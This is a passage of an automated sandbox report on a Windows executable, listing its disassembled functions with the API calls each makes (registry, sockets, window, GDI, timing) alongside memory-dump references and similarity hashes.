    • FlsGetValue.KERNEL32(?,00449CAB,00000004,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C2C2
    • FlsSetValue.KERNEL32(00000000,?,00449CAB,00000004,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C2E9
    • GetCurrentThreadId.KERNEL32 ref: 0044C301
    • SetLastError.KERNEL32(00000000,?,00449CAB,00000004,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C318
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorLastValue$CurrentThread
    • String ID: XF
    • API String ID: 526964173-166504293
    • Opcode ID: 0ce2ca5618a0c732420479d5d70867055caadec78b94139af839bb20ca1d17f1
    • Instruction ID: 1e9ca1f56f664176735d32dad2d1092eb4a2f929a253f0e119f46fcfb7a96736
    • Opcode Fuzzy Hash: 0ce2ca5618a0c732420479d5d70867055caadec78b94139af839bb20ca1d17f1
    • Instruction Fuzzy Hash: FDF0FC31503712DFE3302F61AD4D6563BA4EB00766F044529F986962A2DFB4CC008B99
    Function 0043C7EA Relevance: 9.2, APIs: 6, Instructions: 219fileCOMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(00000000,00000000), ref: 0043C865
    • GetStdHandle.KERNEL32(000000F6,0045C6D0), ref: 0043C8C2
    • GetLastError.KERNEL32(00000000,00000000), ref: 0043C91E
    • GetExitCodeProcess.KERNEL32(?,?), ref: 0043C959
    • GetLastError.KERNEL32(00000000,00000000), ref: 0043C98E
      • Part of subcall function 00417DBC: CloseHandle.KERNEL32 ref: 00417DD8
      • Part of subcall function 00417DBC: CloseHandle.KERNEL32(?), ref: 00417DE6
      • Part of subcall function 00417DBC: CloseHandle.KERNEL32(?), ref: 00417DF4
      • Part of subcall function 00417DBC: CloseHandle.KERNEL32(?), ref: 00417E06
    • ReadFile.KERNEL32(00000000,?,000000FF,?,00000000), ref: 0043CA20
      • Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Handle$Close$ErrorLast$ByteCharMultiWide$CodeExitFileProcessRead_strlen
    • String ID:
    • API String ID: 2518333764-0
    • Opcode ID: b91fcf268958015b0d81186bff795ecb0345dfc051b3ca2a65bd69e4bd5405f0
    • Instruction ID: 08a36f61e83a8decadca1c664de08f1ee49e3bfe3589df4b7dfc1e86d7019bb4
    • Opcode Fuzzy Hash: b91fcf268958015b0d81186bff795ecb0345dfc051b3ca2a65bd69e4bd5405f0
    • Instruction Fuzzy Hash: 4C81D371900259EFCF10EF65C8819EE7BB4AF08324F14566BF461B7291D7389E81CB59
    Function 004236D5 Relevance: 9.2, APIs: 6, Instructions: 188COMMON
    Download Yara Rule
    APIs
    • CoInitialize.OLE32(00000000), ref: 00423707
    • SHGetMalloc.SHELL32(?), ref: 00423714
    • SHGetDesktopFolder.SHELL32(?), ref: 00423799
    • SHBrowseForFolderW.SHELL32(?), ref: 00423877
    • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0042389A
    • CoUninitialize.OLE32 ref: 004238E6
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Folder$BrowseDesktopFromInitializeListMallocPathUninitialize
    • String ID:
    • API String ID: 2328888689-0
    • Opcode ID: ec80f694a4e7f523130a41a95729ebf83eaecb28f6ab609ce4d3ca5068c59f77
    • Instruction ID: 9dfa527d82a11722d366a7158b9d2072c516f7a9572ea281cdfb609d7d1dcd87
    • Opcode Fuzzy Hash: ec80f694a4e7f523130a41a95729ebf83eaecb28f6ab609ce4d3ca5068c59f77
    • Instruction Fuzzy Hash: DF718EB5900219EFDB00EF95D8848CEB7B8FF48315B5481ABE505A7211DB38EE85CF98
    Function 00454706 Relevance: 9.2, APIs: 6, Instructions: 168COMMON
    Download Yara Rule
    APIs
    • GetStringTypeW.KERNEL32(00000001,00462758,00000001,?,0045C350,00000024,00000003), ref: 0045472A
    • GetLastError.KERNEL32 ref: 0045473C
    • GetStringTypeW.KERNEL32(?,?,?,?,0045C350,00000024,00000003), ref: 00454766
    • WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,0045C350,00000024,00000003), ref: 004547BE
    • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000000), ref: 00454841
    • GetStringTypeA.KERNEL32(?,?,?,00000000,?), ref: 004548D3
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: StringType$ByteCharMultiWide$ErrorLast
    • String ID:
    • API String ID: 319667368-0
    • Opcode ID: d8a5474d8f7632a5ca47f23ebc5ef1e3a43f5e75f047d479d32f6b3b0f2edee6
    • Instruction ID: 1c1d1a3cfd943f37dbf2ab9dcfc78d84780ba350647b4ec12e8bbc28cf15e5f7
    • Opcode Fuzzy Hash: d8a5474d8f7632a5ca47f23ebc5ef1e3a43f5e75f047d479d32f6b3b0f2edee6
    • Instruction Fuzzy Hash: BF51A071800219EBDF219FA4DC458EF7BB4FF4975AB20412BF810A6262D3388D95DB98
    Function 0043C5A3 Relevance: 9.2, APIs: 6, Instructions: 162registryCOMMON
    Download Yara Rule
    APIs
    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043C64B
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0043C690
    • RegCloseKey.ADVAPI32(?,00000000,00000000,00000000), ref: 0043C6C1
    • RegEnumValueW.ADVAPI32(00000001,-00000001,?,?,00000000,?,00000000,00000000), ref: 0043C6FC
    • RegCloseKey.ADVAPI32(00000001,00000000,?), ref: 0043C747
    • RegCloseKey.ADVAPI32(?), ref: 0043C751
      • Part of subcall function 0041FE6D: GetLastError.KERNEL32(00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE82
      • Part of subcall function 0041FE6D: FormatMessageW.KERNEL32(00001000,00000000,0047C7A0,00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE96
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Close$ConnectEnumErrorFormatLastMessageOpenRegistryValue
    • String ID:
    • API String ID: 773758466-0
    • Opcode ID: 4912827d162a849eeec17162a3f2574921f1d73c61e649d51dc88a51098771fb
    • Instruction ID: 20792c3d7f812a32157260c25cbcf3585e4f6a1056021a8675d112e4a3857f4a
    • Opcode Fuzzy Hash: 4912827d162a849eeec17162a3f2574921f1d73c61e649d51dc88a51098771fb
    • Instruction Fuzzy Hash: 43513D72900109FBCB14EFE1D8868EE7779EF08314F14546BF501B7162DB38AE859B99
    Function 00453BD4 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
    Download Yara Rule
    APIs
    • GetStringTypeW.KERNEL32(00000001,00462758,00000001,?,0045C138,0000001C,0044EC56,00000001,?,00000001,?,?,?,00000001,?,?), ref: 00453BF8
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,00000000,00455939,?), ref: 00453C0A
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0045C138,0000001C,0044EC56,00000001,?,00000001,?,?,?,00000001), ref: 00453C6C
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 00453CEA
    • GetStringTypeW.KERNEL32(?,?,00000000,?), ref: 00453CFC
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharMultiStringTypeWide$ErrorLast
    • String ID:
    • API String ID: 3581945363-0
    • Opcode ID: 588278d77e37579334d505289a6537332f8eff318476345788ce41d76e50fa72
    • Instruction ID: 7b0bde08bb801c7efdf3f712f7aa1e62be76f32fac42d5e414aed62eba30da79
    • Opcode Fuzzy Hash: 588278d77e37579334d505289a6537332f8eff318476345788ce41d76e50fa72
    • Instruction Fuzzy Hash: D641F531800215EBDF229F50DC49AAF3BB5EF08793F14011AFD10A6252D738CE59DBA9
    Function 0042F107 Relevance: 9.1, APIs: 6, Instructions: 142networkCOMMON
    Download Yara Rule
    APIs
    • select.WSOCK32(00000000,00000001,00000000,00000000,?,0045C6D0), ref: 0042F19C
    • WSAGetLastError.WSOCK32(00000000,00000000,00000001,00000000,00000000,?,0045C6D0), ref: 0042F1A7
    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000,00000001,00000000,00000000,?,0045C6D0), ref: 0042F1D1
    • 715E1E40.WSOCK32(00000000,?,?,00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,0045C6D0), ref: 0042F1E6
    • _strlen.LIBCMT ref: 0042F227
      • Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
      • Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharMultiWide_strlen$ErrorLastselect
    • String ID:
    • API String ID: 3011618667-0
    • Opcode ID: 6b15b43cf9e05b025934bcb4949c6a2a1564fb215bbb25641d590acf3ae79a33
    • Instruction ID: 49a0b57b1716e881498c6cccfb7f5a7b1c7207353685988fd0dcfc9e43c18dba
    • Opcode Fuzzy Hash: 6b15b43cf9e05b025934bcb4949c6a2a1564fb215bbb25641d590acf3ae79a33
    • Instruction Fuzzy Hash: C3410435600218EBDB20EAA5D8819EF73B8EF05324F9045BFF815D7251DB38ED448B69
    Function 00406BB2 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
    Download Yara Rule
    APIs
    • 6F530860.COMCTL32(?,?,?,?,?,?,004048F8,?,?,?,?,?), ref: 00406C1B
    • 6F530860.COMCTL32(?,?,?,?,?,?,004048F8,?,?,?,?,?), ref: 00406C30
    • DeleteObject.GDI32(?), ref: 00406C40
    • DestroyCursor.USER32(?), ref: 00406C50
    • DeleteObject.GDI32(?), ref: 00406C60
    • DestroyCursor.USER32(?), ref: 00406CA2
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CursorDeleteDestroyF530860Object
    • String ID:
    • API String ID: 4002035886-0
    • Opcode ID: 1e5da546bdd14cc893a35634ba3a52cc5e227db2df9398bf0c0a04b3069a8235
    • Instruction ID: 5190c236cba640713588830f41552d92e9898bcea78dae1d236462c55c98861b
    • Opcode Fuzzy Hash: 1e5da546bdd14cc893a35634ba3a52cc5e227db2df9398bf0c0a04b3069a8235
    • Instruction Fuzzy Hash: C94193716043118FE724DF69D98896B77A8FF04315B16092FE982E3391C73DEC14CA99
    Function 00440AA4 Relevance: 9.1, APIs: 6, Instructions: 118windowCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0043F161: IsWindow.USER32(00000000), ref: 0043F18E
    • GetMenu.USER32(?), ref: 00440AE7
    • GetMenuItemCount.USER32(?), ref: 00440B09
    • GetMenuStringW.USER32(?,00000000,?,00007FFF,00000400), ref: 00440B35
    • GetMenuItemID.USER32(?,00000000), ref: 00440B9A
    • GetSubMenu.USER32(?,00000000), ref: 00440BA5
    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00440BDC
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Menu$Item$CountMessagePostStringWindow
    • String ID:
    • API String ID: 3481743490-0
    • Opcode ID: 8a828ab3c79dd63c085cc2e1e50641ae8e5a27b272b051bade9ce038c5441bc6
    • Instruction ID: 7c069f666623686826f3ddcb0e2fe3ddab47299d4bb218ac2af1fa814190d89b
    • Opcode Fuzzy Hash: 8a828ab3c79dd63c085cc2e1e50641ae8e5a27b272b051bade9ce038c5441bc6
    • Instruction Fuzzy Hash: 97419471A00218AFEB11AFA5DC45B9E77B8EF04318F10406BF615B7251D778AE518B9C
    Function 0040B6AE Relevance: 9.1, APIs: 6, Instructions: 93windowCOMMON
    Download Yara Rule
    APIs
    • ShowWindow.USER32(00000003,00000000), ref: 0040B705
    • EnableWindow.USER32(00000000,00000000), ref: 0040B719
    • ShowWindow.USER32(00000003,00000000), ref: 0040B766
    • ShowWindow.USER32(00000000,00000004), ref: 0040B76E
    • EnableWindow.USER32(00000000,00000001), ref: 0040B782
    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0040B7A6
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$Show$Enable$MessageSend
    • String ID:
    • API String ID: 642888154-0
    • Opcode ID: 94d56c342f8d4eab854a69fc706c86c6b5cc5f2542955767c30093fee8fa4aa4
    • Instruction ID: a343d61098662c026a0e05134150219735869de3340b639ff4ce1e3fe93cd216
    • Opcode Fuzzy Hash: 94d56c342f8d4eab854a69fc706c86c6b5cc5f2542955767c30093fee8fa4aa4
    • Instruction Fuzzy Hash: 5F315C70500344EFD722DF28C888B967BE0EF85704F1405AAEA51AB2E2C778A994CB5D
    Function 0040CE65 Relevance: 9.1, APIs: 6, Instructions: 93COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: _logf$Line
    • String ID:
    • API String ID: 3969295912-0
    • Opcode ID: 7e2386a04ee5375af61d30ea3763d67e5ddcd565e541af38a9463bf76d7220f1
    • Instruction ID: 021b2969e876ab9d9f3f238a6f546ee0806e31d252411d7e34cc42bcf1068359
    • Opcode Fuzzy Hash: 7e2386a04ee5375af61d30ea3763d67e5ddcd565e541af38a9463bf76d7220f1
    • Instruction Fuzzy Hash: BF31617150050AEFCF049F62EA495AE7F78FF50351F124169E881320A5D77898B6DF89
    Function 004536F2 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
    Download Yara Rule
    APIs
    • GetCommandLineW.KERNEL32(00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453705
    • GetLastError.KERNEL32(?,0044BFA2,?,0045B1B8,00000060), ref: 00453717
    • GetCommandLineW.KERNEL32(00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453737
    • GetCommandLineA.KERNEL32(74DF0A60,?,00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453742
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453758
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,00000000,?,0044BFA2,?,0045B1B8,00000060), ref: 00453779
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CommandLine$ByteCharMultiWide$ErrorLast
    • String ID:
    • API String ID: 1286790906-0
    • Opcode ID: f58abc882e8807c7317fdbafc6e131111f409bb43f57f6f984ead0cf313c3428
    • Instruction ID: 6a2698e997fe883244a90919812289e027963571f45adb5c732ca680cf72a7a1
    • Opcode Fuzzy Hash: f58abc882e8807c7317fdbafc6e131111f409bb43f57f6f984ead0cf313c3428
    • Instruction Fuzzy Hash: 281148F190821DABD6207EA59C84E37768DC70D3EBF21422BFD05C3183D699DD48866D
    Function 00411E91 Relevance: 9.1, APIs: 6, Instructions: 56sleepCOMMON
    Download Yara Rule
    APIs
    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411EA3
    • QueryPerformanceCounter.KERNEL32(004115DC,?,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411ED0
    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411EDA
    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411EE2
    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004115DC,?,?,00000000), ref: 00411EEC
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: PerformanceQuery$CounterSleep$Frequency
    • String ID:
    • API String ID: 2833360925-0
    • Opcode ID: 227dc428acba349b87143b21466f78d99fc1399157bde67c1f8ea1aba1aa589c
    • Instruction ID: fd00bcc09fcb72a1d4ee2113bc4141e302d44ef8310011320d93385828451225
    • Opcode Fuzzy Hash: 227dc428acba349b87143b21466f78d99fc1399157bde67c1f8ea1aba1aa589c
    • Instruction Fuzzy Hash: 73118F31D1462EEBCF009FE4ED89AEDBB78FF08301F0004A6E541A2161EB38D595C769
    Function 0040CBFD Relevance: 9.1, APIs: 6, Instructions: 54COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0040CCF8: DeleteObject.GDI32(?), ref: 0040CD3D
      • Part of subcall function 0040CCF8: ExtCreatePen.GDI32(?,?,?,00000000,00000000,?,?), ref: 0040CD84
      • Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CD94
      • Part of subcall function 0040CCF8: BeginPath.GDI32(?), ref: 0040CDAE
      • Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CDCD
    • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0040CC31
    • LineTo.GDI32(?,?,00000000), ref: 0040CC41
    • MoveToEx.GDI32(?,?,-00000002,00000000), ref: 0040CC4F
    • LineTo.GDI32(?,?,-00000003), ref: 0040CC5B
    • EndPath.GDI32(?), ref: 0040CC6E
    • StrokePath.GDI32(?), ref: 0040CC7A
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
    • String ID:
    • API String ID: 372113273-0
    • Opcode ID: 9ecf42e750dd20d58ba297a2de3f40783d5e83dbea0e0e233273d38df79948fd
    • Instruction ID: f30265a1fcac77ba34f8cd65a0e3c2bfe06a34cf91edbd35c06c720051772893
    • Opcode Fuzzy Hash: 9ecf42e750dd20d58ba297a2de3f40783d5e83dbea0e0e233273d38df79948fd
    • Instruction Fuzzy Hash: 27115A32100248BBDF119F64EC48FDA7B69EF49320F148525FD18662E1C7759910DB64
